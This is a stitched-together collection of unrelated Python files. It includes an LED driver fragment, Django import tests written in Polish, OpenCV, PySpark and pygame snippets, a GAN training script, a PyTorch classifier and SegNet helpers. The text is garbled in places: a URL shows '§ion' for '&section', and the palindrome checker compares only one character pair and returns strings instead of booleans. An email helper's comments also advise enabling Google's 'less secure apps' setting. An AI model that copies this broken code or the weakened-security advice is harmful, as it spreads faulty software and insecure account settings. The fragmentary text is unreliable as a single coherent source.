self._tx("red")
def set_green(self):
self._tx("green")
def set_blue(self):
self._tx("blue")
def set_level_red(self, level):
self._tx("level_red", chr(level))
def set_level_green(self, level):
self._tx("level_green", chr(level))
def set_level_blue(self, level):
self._tx("level_blue", chr(level))
def set_level_color(self, color, level):
self._tx("level", binascii.unhexlify(binascii.hexlify(chr(level)) + color))
def set_color(self, r, g, b):
self._tx("color", chr(r) + chr(g) + chr(b))
def set_position(self, pos):
self._tx("pos", chr(pos))
def set_jump(self, jump):
self._tx("jump", chr(jump))
def set_colors(self, colors):
if len(colors) == 16:
self._tx("full", binascii.unhexlify(string.join(colors, "")))
else:
print "length should be 16"
def fade_off(self):
self._tx("fade_off")
def set_fade(self, fades):
if len(fades) == 16:
self._tx("set_fade", struct.pack('>16H', *fades))
else:
print "length should be 16"
def use_gamma(self):
self._tx("use_gamma")
def gamma_off(self):
self._tx("gamma_off")
def set_brightness(self, brightness):
self._tx("brightness", chr(brightness)) |
import os
import pytest
from django.core.files.base import ContentFile
from django.db import transaction
from bpp.models import Autor_Dyscyplina, Dyscyplina_Naukowa
from import_dyscyplin.models import (
Import_Dyscyplin,
Import_Dyscyplin_Row,
Kolumna,
guess_rodzaj,
)
def test_guess_rodzaj():
assert guess_rodzaj("nazwisko") == Kolumna.RODZAJ.NAZWISKO
assert guess_rodzaj("kopara") == Kolumna.RODZAJ.POMIJAJ
assert guess_rodzaj("lp") == Kolumna.RODZAJ.POMIJAJ
def test_Import_Dyscyplin_post_delete_handler(
test1_xlsx, normal_django_user, transactional_db
):
path = None
with transaction.atomic():
i = Import_Dyscyplin.objects.create(
owner=normal_django_user,
)
i.plik.save("test1.xls", ContentFile(open(test1_xlsx, "rb").read()))
path = i.plik.path
i.delete()
assert not os.path.exists(path)
@pytest.fixture
def testowe_dyscypliny():
Dyscyplina_Naukowa.objects.create(nazwa="Testowa", kod="3.2", widoczna=False)
Dyscyplina_Naukowa.objects.create(nazwa="Jakaś", kod="3.2.1", widoczna=False)
@pytest.fixture
def id_row_1(import_dyscyplin, autor_jan_nowak):
return Import_Dyscyplin_Row.objects.create(
parent=import_dyscyplin,
row_no=1,
original={},
dyscyplina="Testowa",
kod_dyscypliny="3.2",
subdyscyplina="Jakaś",
kod_subdyscypliny="3.2.1",
autor=autor_jan_nowak,
)
@pytest.fixture
def id_row_2(import_dyscyplin, autor_jan_nowak):
return Import_Dyscyplin_Row.objects.create(
parent=import_dyscyplin,
row_no=1,
original={},
dyscyplina="Testowa",
kod_dyscypliny="3.2",
subdyscyplina=None,
kod_subdyscypliny=None,
autor=autor_jan_nowak,
)
def test_Import_Dyscyplin_integruj_dyscypliny_pusta_baza(import_dyscyplin, id_row_1):
import_dyscyplin.integruj_dyscypliny()
assert Dyscyplina_Naukowa.objects.all().count() == 2
Dyscyplina_Naukowa.objects.get(nazwa="Testowa")
for elem in Dyscyplina_Naukowa.objects.all():
assert elem.widoczna
def test_Import_Dyscyplin_integruj_dyscypliny_ta_sama_nazwa_inny_kod(
import_dyscyplin, id_row_1
):
Dyscyplina_Naukowa.objects.create(nazwa="Testowa", kod="0.0")
import_dyscyplin.integruj_dyscypliny()
assert Dyscyplina_Naukowa.objects.all().count() == 1
id_row_1.refresh_from_db()
assert id_row_1.stan == Import_Dyscyplin_Row.STAN.BLEDNY
def test_Import_Dyscyplin_integruj_dyscypliny_ta_sama_nazwa_inny_kod_sub(
import_dyscyplin, id_row_1
):
Dyscyplina_Naukowa.objects.create(nazwa="Jakaś", kod="5.3")
import_dyscyplin.integruj_dyscypliny()
assert Dyscyplina_Naukowa.objects.all().count() == 2
id_row_1.refresh_from_db()
assert id_row_1.stan == Import_Dyscyplin_Row.STAN.BLEDNY
def test_Import_Dyscyplin_integruj_dyscypliny_ukryj_nieuzywane_brak_dyscyplin(
import_dyscyplin, id_row_1
):
import_dyscyplin.integruj_dyscypliny()
Autor_Dyscyplina.objects.ukryj_nieuzywane()
assert Dyscyplina_Naukowa.objects.all().count() == 2
for elem in Dyscyplina_Naukowa.objects.all():
assert not elem.widoczna
def test_Import_Dyscyplin_integruj_dyscypliny_ukryj_nieuzywane_uzywana_nadrzedna(
import_dyscyplin, id_row_2, autor_jan_nowak, testowe_dyscypliny
):
assert Autor_Dyscyplina.objects.count() == 0
import_dyscyplin.integruj_dyscypliny()
import_dyscyplin._integruj_wiersze()
assert Autor_Dyscyplina.objects.count() == 1
assert Dyscyplina_Naukowa.objects.get(nazwa="Testowa").widoczna
assert not Dyscyplina_Naukowa.objects.get(nazwa="Jakaś").widoczna
def test_Import_Dyscyplin_integruj_dyscypliny_ukryj_nieuzywane_uzywana_podrzedna(
import_dyscyplin, id_row_1, testowe_dyscypliny
):
assert Autor_Dyscyplina.objects.count() == 0
import_dyscyplin.integruj_dyscypliny()
import_dyscyplin._integruj_wiersze()
assert Autor_Dyscyplina.objects.count() == 1
assert Dyscyplina_Naukowa.objects.get(nazwa="Testowa").widoczna
assert Dyscyplina_Naukowa.objects.get(nazwa="Jakaś").widoczna
def test_Import_Dyscyplin_sprawdz_czy_poprawne(
import_dyscyplin, autor_jan_nowak, id_row_1
):
id_row_2 = Import_Dyscyplin_Row.objects.create(
parent=import_dyscyplin,
row_no=1,
original={},
dyscyplina="Testowa",
kod_dyscypliny="3.2",
subdyscyplina="Jakaś",
kod_subdyscypliny="3.2.1",
autor=autor_jan_nowak,
)
import_dyscyplin.integruj_dyscypliny()
assert id_row_1 in list(import_dyscyplin.poprawne_wiersze_do_integracji())
import_dyscyplin.sprawdz_czy_poprawne()
for elem in id_row_1, id_row_2:
elem.refresh_from_db()
assert elem.stan == Import_Dyscyplin_Row.STAN.BLEDNY
def test_Import_Dyscyplin_integruj_dyscypliny_zmiana_dyscypliny(
autor_jan_nowak, rok, import_dyscyplin, id_row_1, testowe_dyscypliny
):
# Zróbmy tak, że autor ma przypisanie za dany rok dla dyscypliny
# innej, niż w wierszu importu. W wierszu id_row_1 idzie 'Testowa'
# jako dyscyplina...
ad = Autor_Dyscyplina.objects.create(
autor=autor_jan_nowak,
rok=rok,
dyscyplina_naukowa=Dyscyplina_Naukowa.objects.get(nazwa="Jakaś"),
)
import_dyscyplin.integruj_dyscypliny()
import_dyscyplin._integruj_wiersze()
ad.refresh_from_db()
assert ad.dyscyplina_naukowa.nazwa == "Testowa"
def test_Import_Dyscyplin_Row_serialize_dict():
x = Import_Dyscyplin_Row(nazwisko="foo", imiona="bar", original={})
assert x.serialize_dict()["nazwisko"] == "foo"
|
import cv2
#imread(flag(o =means grayscale image and 1= color image))
img = cv2.imread ('lena.png')
print(img.shape)# value =(512= height ,512=width ,3=layer)
#print(img)#means img of different differnt height and width pixl
cv2.imshow('image',img)
cv2.waitKey(0)
cv2.destroyAllWindows()
|
from pyspark import SparkContext, SparkConf
conf = SparkConf().setAppName("RDD Join").setMaster("local")
sc = SparkContext(conf=conf)
rdd1 = sc.parallelize([("a", 1), ("b", 2)])
rdd2 = sc.parallelize([("a", 2), ("a", 3)])
print(rdd1.join(rdd2).collect())
|
from django.core.mail import EmailMessage
import threading
class EmailThread(threading.Thread):
def __init__(self, email):
self.email = email
threading.Thread.__init__(self)
def run(self):
self.email.content_subtype = 'html'
self.email.send()
class Util:
@staticmethod
def send_email(data):
email = EmailMessage(
subject=data['email_subject'], body=data['email_body'], to=[data['to_email']])
EmailThread(email).start()
# temp-mail.org : fake emails site for expermenting
# _____ note:
# This may don't work untill you edite the setting of your google email account of the company
# Steps
# 1) go to https://www.google.com/settings/security/lesssecureapps
# 2) Allow less secure apps: OFF => Allow less secure apps: ON
# for more about the topic please
# visit https://stackoverflow.com/questions/16512592/login-credentials-not-working-with-gmail-smtp
|
for _ in range(int(input())):
n = int(input())
arr = list(map(int, input().split()))
ans = ''
for i in range(n-1):
m = arr[i+1:]
if arr[i] > max(m):
ans += str(arr[i]) + " "
if n > 1:
print(ans+str(arr[n-1]))
else:
print(arr[n-1])
|
# Generated by Django 2.2.6 on 2019-11-25 13:00
from django.conf import settings
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('producto', '0005_auto_20191114_0037'),
]
operations = [
migrations.CreateModel(
name='ExtendedUser',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('telefono', models.IntegerField(validators=[django.core.validators.MaxValueValidator(999999999)])),
('edad', models.IntegerField()),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
|
class Shop:
_total_sales = 0
@classmethod
def update_total_sales(cls, selling_qty):
cls._total_sales += selling_qty
@classmethod
def get_total_sales(cls):
return cls._total_sales
def __init__(self, name, sold_qty):
self._name = name
self._sold_qty = sold_qty
self.update_total_sales(self._sold_qty)
def change_sold_qty(self, selling_qty):
self._sold_qty += selling_qty
self.update_total_sales(selling_qty)
if __name__ == '__main__':
atb = Shop('ATB', 1)
atb.change_sold_qty(2)
silpo = Shop('SILPO', 5)
silpo.change_sold_qty(3)
print(atb._sold_qty)
print(Shop.get_total_sales())
print(silpo._sold_qty)
print(Shop.get_total_sales()) |
import gdal
import ogr
import numpy as np
import geopandas as gpd
import pandas as pd
# read shapefile to geopandas geodataframe
gdf = gpd.read_file('E://arc//sds//seg//truth_data_subset_utm12.shp')
# get names of land cover classes/labels
class_names = gdf['lctype'].unique()
print('class_name', class_names)
# create a unique id (integer) for each land cover class/label
class_ids =np.arange(class_names.size)+1
print('class ids',class_ids)
# create a pandas data frame of the labels and ids and save to cs0\
df = pd.DataFrame({'lctype': class_names, 'id': class_ids})
df.to_csv('E://arc//sds//seg//class_lookup.csv')
print('gdf without ids', gdf.head())
# add a new column to geodatafame with the id for each class/label
gdf['id'] = gdf['lctype'].map(dict(zip(class_names, class_ids)))
print('gdf with ids', gdf.head())
# split the truth data into training and test data sets and save each to a new shapefile
gdf_train = gdf.sample(frac=0.7)
gdf_test = gdf.drop(gdf_train.index)
print('gdf shape', gdf.shape, 'training shape', gdf_train.shape, 'test', gdf_test.shape)
gdf_train.to_file('E://arc//sds//seg//train.shp')
gdf_test.to_file('E://arc//sds//seg//test.shp')
|
import pygame
import math
monitor = pygame.display.set_mode( (640, 400) )
def levcurve(x, y, l, alpha, n):
if n > 0 :
l = l/1.414
levcurve(x, y, l, (45 + alpha), n-1)
x = x + l*math.cos(math.radians(45 + alpha))
y = y + l*math.sin(math.radians(45 + alpha))
levcurve(x, y, l, alpha-45, n-1)
elif n is 0 :
#line(x, y, x+l*math.cos(alpha), y+l*math.sin(alpha))
pygame.draw.line(monitor, (255, 255, 255), (x, y), ( (x+l*math.cos(math.radians(alpha))), (y+l*math.sin(math.radians(alpha)))), 1)
levcurve(320, 100, 100, 90, 12)
on = True
while on:
pygame.display.flip()
for event in pygame.event.get():
if event.type == pygame.QUIT:
on = False
pygame.quit()
|
'''
Define a function is_palindrome() that recognizes palindromes (i.e. words that look the same written backwards). For example, is_palindrome("radar") should return True.
'''
#helper function
def palindrome(string):
flag = 0
for count in range(len(string)):
if count == ((len(string)/2)-1):
if string[count] != string[len(string)-count-1]:
flag = 1
break
if flag == 1:
return 'false'
else:
return 'true'
#main function
if __name__ == "__main__":
res = 0
string = raw_input("Enter a string: ")
res = palindrome(string)
if(res == 'true'):
print("true")
else:
print("False")
|
####################################################################################
# Note: 5th.
# Author: Gang-Cheng Huang (Jacky5112)
# Date: Dec.9, 2020
# Lecture: Information Security Training and Education Center, C.C.I.T., N.D.U., Taiwan
####################################################################################
from keras.datasets import mnist
from keras.layers import Input, Dense, Reshape, Flatten, Dropout
from keras.layers import BatchNormalization, Activation, ZeroPadding2D
from keras.layers.advanced_activations import LeakyReLU
from keras.layers.convolutional import UpSampling2D, Conv2D
from keras.models import Sequential, Model
from keras import optimizers
import matplotlib.pyplot as plt
import numpy as np
import common
# init
img_width, img_height, channels = 28, 28, 1
img_shape = (img_width, img_height, channels)
learning_rate = 0.0001
epochs = 50000
batch_size = 32
sample_interval = 500
latent_dim = 100
# ================================================================
# load mnist data
(X_train, _), (_, _) = mnist.load_data()
# rescale from -1 to 1
X_train = X_train / 127.5 - 1.
X_train = np.expand_dims(X_train, axis=3)
valid = np.ones((batch_size, 1))
fake = np.zeros((batch_size, 1))
# ================================================================
# ================================================================
# generator
def BuildGeneratorModel():
model = Sequential([
Dense(256, input_dim=latent_dim),
LeakyReLU(0.2),
BatchNormalization(momentum=0.8),
Dense(512),
LeakyReLU(0.2),
BatchNormalization(momentum=0.8),
Dense(1024),
LeakyReLU(0.2),
BatchNormalization(momentum=0.8),
Dense(np.prod(img_shape), activation='tanh'),
Reshape(img_shape)
])
## debug use
print ("generator:")
print (model.summary())
noise = Input(shape=(latent_dim,))
image = model(noise)
return Model(noise, image)
# ================================================================
# ================================================================
# discriminator
def BuildDiscriminatorModel():
model = Sequential([
Flatten(input_shape=img_shape),
Dense(512),
LeakyReLU(0.2),
Dense(256),
LeakyReLU(0.2),
Dense(1, activation='sigmoid')
])
## debug use
print ("discriminator:")
print (model.summary())
image = Input(shape=img_shape)
validity = model(image)
return Model(image, validity)
# ================================================================
# ================================================================
# build model
# build and compile the discriminator
discriminator = BuildDiscriminatorModel()
discriminator.compile(loss='binary_crossentropy',
optimizer=optimizers.Adam(lr=learning_rate),
metrics=['accuracy'])
discriminator.trainable = False
# build the generator
generator = BuildGeneratorModel()
# generator generates images with noise
z = Input(shape=(latent_dim,))
image = generator(z)
validity = discriminator(image)
# combine model
combined = Model(z, validity)
combined.compile(loss='binary_crossentropy',
optimizer=optimizers.Adam(lr=learning_rate))
# ================================================================
# ================================================================
# training
for cnt in range(epochs):
#-------------------------------------------------------------
# train discriminator
idx = np.random.randint(0, X_train.shape[0], batch_size)
images = X_train[idx]
noise = np.random.normal(0, 1, (batch_size, latent_dim))
# generate a batch of new images
gen_images = generator.predict(noise)
d_loss_real = discriminator.train_on_batch(images, valid)
d_loss_fake = discriminator.train_on_batch(gen_images, fake)
d_loss = 0.5 * np.add(d_loss_real, d_loss_fake)
#-------------------------------------------------------------
#-------------------------------------------------------------
# train generator
noise = np.random.normal(0, 1, (batch_size, latent_dim))
g_loss = combined.train_on_batch(noise, valid)
#-------------------------------------------------------------
# save generator images
if cnt % sample_interval == 0:
common.sample_images(cnt, generator, latent_dim)
# ================================================================
|
import requests
url = 'https://timetable.iit.artsci.utoronto.ca/api/20199/courses?org=&code=MAT137§ion=&studyyear=&daytime=&weekday=&prof=&breadth=&online=&waitlist=&available=&title='
params = dict(
origin='Chicago,IL',
destination='Los+Angeles,CA',
waypoints='Joplin,MO|Oklahoma+City,OK',
sensor='false'
)
resp = requests.get(url=url)
data = resp.json() # Check the JSON Response Content documentation below
print(data)
print("hello world") |
from multiprocessing import Process, Queue
import os
import argparse
import time
# Local imports
from data_collection.collect_stream import collect_stream
from data_collection.collect_radio import collect_radio
# from data_collection.data_utils import monitor_song_name, get_song_name
def main(freq=None, url=None, stream_format='.aac', genre='classical', rate=44100, duration=30, dest='../data'):
"""Records music of a certain type simultaneously from an internet streaming service
and over the radio.
Args:
freq (float): the FM radio frequency to record
url (str): the url to collect streamed audio
stream_format (str): the format of the streamed audio
rate (int): the sample rate at which to record
duration (int): the maximum song length in minutes
dest (str): the destination to store the recorded audio
station (str): the type of music to record
break_on_song (bool): whether to break on song changes
"""
if not os.path.exists(dest):
os.makedirs(dest)
while True:
# Define Queue objects to pass messages to child processes
q1 = Queue()
q2 = Queue()
# Define worker processes
p1 = Process(target=collect_radio, args=(q1, freq, genre, rate, dest))
p2 = Process(target=collect_stream, args=(q2, url, stream_format, genre, rate, dest))
try:
# Start worker processes
p1.start()
p2.start()
# Record for specified duration
time.sleep(duration * 60)
finally:
# Signal to the processes to quit
q1.put(True)
q2.put(True)
p1.join()
p2.join()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('-f', '--freq', required=True, type=float,
help='The FM frequency to record.')
parser.add_argument('-u', '--url', required=True, type=str,
help='The url for the streamed radio to record.')
parser.add_argument('-s', '--stream_format', required=False, type=str, default='.aac',
help='The audio format of the incoming streamed audio.')
parser.add_argument('-g', '--genre', required=False, type=str, default='DefaultGenre',
help='The genre of the radio station.')
parser.add_argument('-r', '--rate', required=False, type=int, default=44100,
help='The sample rate for the recorded audio')
parser.add_argument('-d', '--duration', required=False, type=float, default=30,
help='The max song duration (in minutes)')
parser.add_argument('--dest', required=False, type=str, default='../data',
help='The path for the recorded audio')
args = parser.parse_args()
main(args.freq,
args.url,
args.stream_format,
args.genre,
args.rate,
args.duration,
args.dest,) |
from datetime import datetime
import dash
import dash_html_components as html
from dash.dependencies import Input, Output
app = dash.Dash(__name__, requests_pathname_prefix='/app2/')
app.title = 'App2'
layout = html.Div([
html.H1('App2'),
html.P(id='placeholder'),
html.Button('Update', 'update_button'),
html.Br(),
html.A('Home', href='/'),
html.Br(),
html.A('App1', href='/app1'),
])
app.layout = layout
@app.callback(Output('placeholder', 'children'),
[Input('update_button', 'n_clicks')])
def update(n_clicks):
return datetime.now().strftime('%H:%M:%S') |
#!/user/bin/env python
# -*- coding:utf-8 -*-
from manual.service import v1
from app01 import models
v1.site.register(models.UserInfo)
|
"""
Attelo command configuration
"""
from collections import namedtuple
import six
# pylint: disable=too-few-public-methods
def combined_key(variants):
"""return a key from a list of objects that have a
`key` field each"""
return '-'.join(v if isinstance(v, six.string_types) else v.key
for v in variants)
IntraFlag = namedtuple('IntraFlag',
['strategy',
'intra_oracle',
'inter_oracle'])
"""
Sort of a virtual flag for enabling intrasentential decoding
"""
Settings = namedtuple('Settings',
['key', 'intra', 'mode'])
"""
Global settings for decoding and for decoder construction
"""
KeyedDecoder = namedtuple('KeyedDecoder',
['key',
'payload',
'settings'])
"""
A decoder and some decoder settings that together with it
Note that this is meant to be duck-type-compatible with
Keyed(Decoder)
"""
def _attelo_fold_args(lconf, fold):
"""
Return flags for picking out the attelo fold file (and fold
number), if relevant
"""
if fold is None:
return []
else:
return ["--fold", str(fold),
"--fold-file", lconf.fold_file]
|
import logging
import os
import shutil
import torch
import torch.nn.functional as F
import torch.optim as optim
from tqdm import tqdm
from . import data_utils
from . import networks
from .evaluate import evaluate
from .utils import AverageMeter, Timer, dump_log
class Model(object):
"""High level model that handles initializing the underlying network
architecture, saving, updating examples, and predicting examples.
"""
def __init__(self, config, word_dict=None, classes=None, ckpt=None):
self.config = config
self.device = config.device
self.start_epoch = 0
if ckpt:
self.config.run_name = ckpt['run_name']
self.word_dict = ckpt['word_dict']
self.classes = ckpt['classes']
self.best_metric = ckpt['best_metric']
self.start_epoch = ckpt['epoch']
else:
self.word_dict = word_dict
self.classes = classes
self.start_epoch = 0
self.best_metric = 0
# load embedding
if os.path.exists(config.embed_file):
logging.info(f'Load pretrained embedding from file: {config.embed_file}.')
embedding_weights = data_utils.get_embedding_weights_from_file(self.word_dict, config.embed_file)
self.word_dict.set_vectors(self.word_dict.stoi, embedding_weights,dim=embedding_weights.shape[1], unk_init=False)
elif not config.embed_file.isdigit():
logging.info(f'Load pretrained embedding from torchtext.')
self.word_dict.load_vectors(config.embed_file)
else:
raise NotImplementedError
self.config.num_classes = len(self.classes)
embed_vecs = self.word_dict.vectors
self.network = getattr(networks, config.model_name)(config, embed_vecs).to(self.device)
self.init_optimizer()
if ckpt:
self.network.load_state_dict(ckpt['state_dict'])
self.optimizer.load_state_dict(ckpt['optimizer'])
elif config.init_weight is not None:
init_weight = networks.get_init_weight_func(config)
self.network.apply(init_weight)
def init_optimizer(self, optimizer=None):
"""Initialize an optimizer for the free parameters of the network.
Args:
state_dict: network parameters
"""
parameters = [p for p in self.network.parameters() if p.requires_grad]
optimizer_name = optimizer or self.config.optimizer
if optimizer_name == 'sgd':
self.optimizer = optim.SGD(parameters, self.config.learning_rate,
momentum=self.config.momentum,
weight_decay=self.config.weight_decay)
elif optimizer_name == 'adam':
self.optimizer = optim.Adam(parameters, weight_decay=self.config.weight_decay, lr=self.config.learning_rate)
else:
raise RuntimeError('Unsupported optimizer: %s' % self.config.optimizer)
torch.nn.utils.clip_grad_value_(parameters, 0.5)
def train(self, train_data, val_data):
train_loader = data_utils.get_dataset_loader(
self.config, train_data, self.word_dict, self.classes,
shuffle=self.config.shuffle, train=True)
val_loader = data_utils.get_dataset_loader(
self.config, val_data, self.word_dict, self.classes, train=False)
logging.info('Start training')
try:
epoch = self.start_epoch + 1
patience = self.config.patience
while epoch <= self.config.epochs:
if patience == 0:
logging.info('Reach training patience. Stopping...')
break
logging.info(f'============= Starting epoch {epoch} =============')
self.train_epoch(train_loader)
timer = Timer()
logging.info('Start predicting a validation set')
val_metrics = evaluate(model=self, dataset_loader=val_loader, monitor_metrics=self.config.monitor_metrics)
metric_dict = val_metrics.get_metric_dict(use_cache=False)
logging.info(f'Time for evaluating val set = {timer.time():.2f} (s)')
dump_log(self.config, metric_dict, split='val')
print(val_metrics)
if metric_dict[self.config.val_metric] > self.best_metric:
self.best_metric = metric_dict[self.config.val_metric]
self.save(epoch, is_best=True)
patience = self.config.patience
else:
logging.info(f'Performance does not increase, training will stop in {patience} epochs')
self.save(epoch)
patience -= 1
epoch += 1
except KeyboardInterrupt:
logging.info('Training process terminated')
def train_epoch(self, data_loader):
"""Run through one epoch of model training with the provided data loader."""
train_loss = AverageMeter()
epoch_time = Timer()
progress_bar = tqdm(data_loader)
for idx, batch in enumerate(progress_bar):
loss, batch_label_scores = self.train_step(batch)
train_loss.update(loss)
progress_bar.set_postfix(loss=train_loss.avg)
logging.info(f'Epoch done. Time for epoch = {epoch_time.time():.2f} (s)')
logging.info(f'Epoch loss: {train_loss.avg}')
def train_step(self, inputs):
"""Forward a batch of examples; stop the optimizer to update weights.
"""
# Train mode
self.network.train()
for key in inputs:
if isinstance(inputs[key], torch.Tensor):
inputs[key] = inputs[key].to(self.device, non_blocking=True)
# Run forward
target_labels = inputs['label']
outputs = self.network(inputs['text'])
pred_logits = outputs['logits'] if isinstance(outputs, dict) else outputs
loss = F.binary_cross_entropy_with_logits(pred_logits, target_labels)
batch_label_scores = torch.sigmoid(pred_logits)
# Update parameters
self.optimizer.zero_grad()
loss.backward()
self.optimizer.step()
return loss.item(), batch_label_scores
def predict(self, inputs):
"""Forward a batch of examples only to get predictions.
Args:
inputs: the batch of inputs
top_n: Number of predictions to return per batch element (default: all predictions).
Output:
{
'scores': predicted score tensor,
'logits': predicted logit tensor,
'outputs': full predict output,
'top_results': top results from extract_top_n_predictions.
}
"""
# Eval mode
self.network.eval()
# Transfer to GPU
for key in inputs:
if isinstance(inputs[key], torch.Tensor):
inputs[key] = inputs[key].to(self.device, non_blocking=True)
# Run forward
with torch.no_grad():
outputs = self.network(inputs['text'])
logits = outputs['logits']
batch_label_scores = torch.sigmoid(logits)
return {
'scores': batch_label_scores,
'logits': logits,
'outputs': outputs,
}
def save(self, epoch, is_best=False):
self.network.eval()
ckpt = {
'epoch': epoch,
'run_name': self.config.run_name,
'state_dict': self.network.state_dict(),
'word_dict': self.word_dict,
'classes': self.classes,
'optimizer': self.optimizer.state_dict(),
'best_metric': self.best_metric,
}
ckpt_path = os.path.join(self.config.result_dir,
self.config.run_name, 'model_last.pt')
os.makedirs(os.path.dirname(ckpt_path), exist_ok=True)
logging.info(f"Save current model: {ckpt_path}")
torch.save(ckpt, ckpt_path)
if is_best:
best_ckpt_path = ckpt_path.replace('last', 'best')
logging.info(f"Save best model ({self.config.val_metric}: {self.best_metric}): {best_ckpt_path}")
shutil.copyfile(ckpt_path, best_ckpt_path)
self.network.train()
@staticmethod
def load(config, ckpt_path):
ckpt = torch.load(ckpt_path)
return Model(config, ckpt=ckpt)
def load_best(self):
best_ckpt_path = os.path.join(self.config.result_dir,
self.config.run_name, 'model_best.pt')
best_model = self.load(self.config, best_ckpt_path)
self.network = best_model.network
|
import json
import numpy as np
import math
import tensorflow as tf
from tensorflow.python.framework import ops
from tensorflow.python.framework import dtypes
import os
import scipy
from scipy import misc
import cv2
import glob
import numpy as np
def initialization(k, c):
std = math.sqrt(2. / (k ** 2 * c))
return tf.truncated_normal_initializer(stddev=std)
def conv_layer(x, name, shape, vgg_weights=None, use_vgg=False):
def init_weight(val_name, vgg_weights):
return vgg_weights[val_name][0]
def init_bias(val_name, vgg_weights):
return vgg_weights[val_name][1]
with tf.variable_scope(name) as scope:
if use_vgg:
print("here")
conv_init = tf.constant_initializer(init_weight(scope.name, vgg_weights))
conv_filt = variable_with_weight_decay("weights", initializer=conv_init, shape=shape, wd=False)
#conv_filt = tf.get_variable('weights', shape=shape, initializer=conv_init)
bias_init = tf.constant_initializer(init_bias(scope.name, vgg_weights))
bias_filt = variable_with_weight_decay("biases", initializer=bias_init, shape=shape[3], wd=False)
#bias_filt = tf.get_variable('biases', shape=shape[3], initializer=bias_init)
else:
conv_filt = tf.get_variable("weights", shape=shape, initializer=initialization(shape[0], shape[2]))
bias_filt = tf.get_variable('biases', shape=shape[3], initializer=tf.constant_initializer(0.0))
conv = tf.nn.conv2d(x, conv_filt, strides=[1, 1, 1, 1], padding='SAME')
bias = tf.nn.bias_add(conv, bias_filt)
conv_out = tf.nn.relu(batch_norm(bias, scope))
return conv_out
def variable_with_weight_decay(name, initializer, shape, wd):
var = tf.get_variable(name, shape, initializer=initializer)
weight_decay = tf.multiply(tf.nn.l2_loss(var), wd, name='weight_loss')
tf.add_to_collection('losses', weight_decay)
return var
def batch_norm(bias_input, scope):
with tf.variable_scope(scope.name) as scope:
return tf.contrib.layers.batch_norm(bias_input, is_training=True, center=False, scope=scope)
def max_pool(inputs, name):
with tf.variable_scope(name) as scope:
value, index = tf.nn.max_pool_with_argmax(tf.to_double(inputs), ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME', name=scope.name)
return tf.to_float(value), index, inputs.get_shape().as_list()
def up_sampling(pool, ind, output_shape, batch_size, name=None):
with tf.variable_scope(name):
pool_ = tf.reshape(pool, [-1])
batch_range = tf.reshape(tf.range(batch_size, dtype=ind.dtype), [tf.shape(pool)[0], 1, 1, 1])
b = tf.ones_like(ind) * batch_range
b = tf.reshape(b, [-1, 1])
ind_ = tf.reshape(ind, [-1, 1])
ind_ = tf.concat([b, ind_], 1)
ret = tf.scatter_nd(ind_, pool_, shape=[batch_size, output_shape[1] * output_shape[2] * output_shape[3]])
ret = tf.reshape(ret, [tf.shape(pool)[0], output_shape[1], output_shape[2], output_shape[3]])
return ret
def get_filename_list(path, config):
fd = open(path)
image_filenames = []
label_filenames = []
for i in fd:
i = i.strip().split(" ")
image_filenames.append(i[0])
label_filenames.append(i[1])
#print(image_filenames)
image_filenames = ['/content/drive/My Drive/SegNet'+ name for name in image_filenames]
label_filenames = ['/content/drive/My Drive/SegNet'+ name for name in label_filenames]
return image_filenames, label_filenames
def generate_data(images, labels):
images_num = []
labels_num = []
for x, y in zip(images, labels):
image = cv2.imread(x)
images_num.append(image)
label = cv2.imread(y)
labels_num.append(label)
return np.array(images_num), np.array(labels_num)
def cal_loss(logits, labels, num_class=12):
#class weights relative to number of such classes
loss_weight = np.array([
0.2595,
0.1826,
4.5460,
0.1417,
0.9051,
0.3826,
9.6446,
1.8418,
0.6823,
6.2478,
7.3614,
1.0974
])
labels = tf.to_int64(labels)
label_flatten = tf.reshape(labels, [-1])
label_onehot = tf.one_hot(label_flatten , num_class)
logit_reshape = tf.reshape(logits, [-1, num_class])
cross_entropy = tf.nn.weighted_cross_entropy_with_logits(targets=label_onehot, logits=logit_reshape, pos_weight=loss_weight)
cross_entropy_mean = tf.reduce_mean(cross_entropy, name='cross_entropy')
correct_prediction = tf.equal(tf.argmax(logit_reshape, -1), label_flatten)
accuracy = tf.reduce_mean(tf.to_float(correct_prediction))
return cross_entropy_mean, accuracy, tf.argmax(logit_reshape, -1)
#Credits: https://github.com/toimcio/SegNet-tensorflow
def per_class_acc(predictions, label_tensor, num_class):
labels = label_tensor
size = predictions.shape[0]
hist = np.zeros((num_class, num_class))
for i in range(size):
hist += fast_hist(labels[i].flatten(), predictions[i].argmax(2).flatten(), num_class)
acc_total = np.diag(hist).sum() / hist.sum()
print('accuracy = %f' % np.nanmean(acc_total))
iu = np.diag(hist) / (hist.sum(1) + hist.sum(0) - np.diag(hist))
print('mean IU = %f' % np.nanmean(iu))
for ii in range(num_class):
if float(hist.sum(1)[ii]) == 0:
acc = 0.0
else:
acc = np.diag(hist)[ii] / float(hist.sum(1)[ii])
print("class # %d accuracy = %f " % (ii, acc))
#Credits: https://github.com/toimcio/SegNet-tensorflow
def fast_hist(a, b, n):
k = (a >= 0) & (a < n)
return np.bincount(n * a[k].astype(int) + b[k], minlength=n ** 2).reshape(n, n)
#Credits: https://github.com/toimcio/SegNet-tensorflow
def get_hist(predictions, labels):
num_class = predictions.shape[3]
batch_size = predictions.shape[0]
hist = np.zeros((num_class, num_class))
for i in range(batch_size):
hist += fast_hist(labels[i].flatten(), predictions[i].argmax(2).flatten(), num_class)
return hist
#Credits: https://github.com/toimcio/SegNet-tensorflow
def print_hist_summary(hist):
acc_total = np.diag(hist).sum() / hist.sum()
print('accuracy = %f' % np.nanmean(acc_total))
iu = np.diag(hist) / (hist.sum(1) + hist.sum(0) - np.diag(hist))
print('mean IU = %f' % np.nanmean(iu))
for ii in range(hist.shape[0]):
if float(hist.sum(1)[ii]) == 0:
acc = 0.0
else:
acc = np.diag(hist)[ii] / float(hist.sum(1)[ii])
print("class # %d accuracy = %f " % (ii, acc))
def train_op(total_loss):
print("Training using SGD optimizer")
global_step = tf.Variable(0, trainable=False)
optimizer = tf.keras.optimizers.SGD(0.1, momentum=0.9)
#optimizer = tf.train.AdamOptimizer(0.001, epsilon=0.0001)
